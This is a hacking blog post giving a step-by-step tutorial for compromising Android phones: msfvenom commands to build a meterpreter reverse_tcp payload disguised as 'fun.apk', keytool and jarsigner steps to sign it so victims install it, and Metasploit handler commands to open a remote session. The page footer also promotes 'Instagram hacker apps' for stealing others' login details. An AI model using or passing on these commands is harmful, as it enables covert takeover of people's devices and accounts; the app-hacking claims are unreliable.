Skip to main content

HOW TO HACK ANDROID USING KALI LINUX 2017 (METASPLOIT)


Getting an access of victim devices (Computer, Android based Phone) is very easy because of reverse exploitation ttacks. A hacker use different types of exploitation’s to gaining access like reverse_tcp, reverse_http and many more with various types of file format (.exe .bat .apk).
A payload which is created using reverse_tcp, When victim download that file and install it then it created a reverse connection victim to attacker. There is may be the victim having firewall or some other defense system, In this attack the firewall looks that the client (victim) to send request to the server (attacker machine) that’s why it allow the connection.
In this tutorial, I am going to show how we can create a android payload and by using that how can we gaining access of victim device.

  • Open terminal:
msfvenom -p android/meterpreter/reverse_tcp set lhost=192.168.0.100 -o fun.apk
Where LHOST is the listening host (In my case this is my private IP as per my lab environment), You can check it by using “ifconfig” command.

Now signing the .apk file, that file doesn’t give any problem while victim trying to install it.

  • For generating the keystore:
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000 
It will ask to set new password for keystore file.

  • For singing the App:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore fun.apk alias_name

  • Start metasploit and exploit.
# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set lhost 192.168.0.101
# exploit -j z
# session -i 1

For better understanding watch Demo given below:
Watch Demo on Our YouTube Channel
Posted by Nagesh ;)

Comments

Post a Comment

Popular posts from this blog

These are the precautions you have to take, When your E-MAIL has been Hacked.

It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out by suggesting some of the steps that you need to take as soon as you realize that your  email account is hacked . Here is a list of steps and procedures that you need to follow in order to initiate the password recovery process: Steps to Recover Gmail Password: It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try: Step-1:  Try resetting your password! This is the fir...
Post a Comment
Read more

Top 10 Free Instagram Hacker App For iPhone and Android.

Top 10 Free Instagram Hacker App For iPhone and Android Posted by Nagesh ;) Instagram is no doubt one of the most used apps when it comes to uploading and sharing pictures with your friends and families. However, as much as you may like to use Instagram, the fact remains that anyone can access your account with or without your consent. How is this possible you may ask? The answer lies in the Instagram hacker app. Yes!! You heard right. An Instagram hacker app is a type of an app that works by retrieving passwords and other login details from a target account. As it stands, since Instagram is available on both the Android and iOS platforms, these apps can be found on this platforms as well. These Instagram hack apps are efficient when it comes to hacking passwords, so it's best to be guaranteed that they will hack your IG account in a matter of minutes. Part 1: 5 Free Instagram Hacker App For iPhone Part 2: 5 Free Instagram Hacker App For Android Part 3: Using ...
Post a Comment
Read more